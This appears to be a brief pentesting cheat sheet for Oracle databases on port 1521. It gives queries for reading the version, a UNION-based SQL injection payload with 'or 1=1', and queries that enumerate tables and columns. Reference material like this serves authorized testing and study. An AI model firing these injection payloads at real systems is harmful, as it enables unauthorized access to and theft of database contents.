Skip to content

1521 - Pentesting oracle

Oracle is a multi-model database management system (DBMS) developed by Oracle Corporation. It is a popular relational database management system used for storing and retrieving large amounts of data. Oracle offers a wide range of features and capabilities, including data warehousing, business intelligence, and real-time data processing.

version 

SELECT * FROM v$version
SELECT BANNER FROM v$version

... UNION SELECT NULL, BANNER FROM v$version -- lorem

sql injection 

lorem' or 1=1 UNION SELECT NULL,NULL,NULL from dual -- ipsum

tables - owned by current user 

SELECT table_name, owner FROM user_tables

tables - accessible by current user 

SELECT table_name, owner FROM all_tables

tables - all 

SELECT table_name, owner FROM dba_tables WHERE owner='schema_name'

columns 

SELECT null,column_name FROM all_tab_columns WHERE table_name = 'USERS' -- lorem

SELECT column_id, owner, table_name, column_name, data_type, data_length, data_precision, data_scale, nullable FROM sys.all_tab_columns WHERE col.table_name = 'AP_INVOICES_ALL';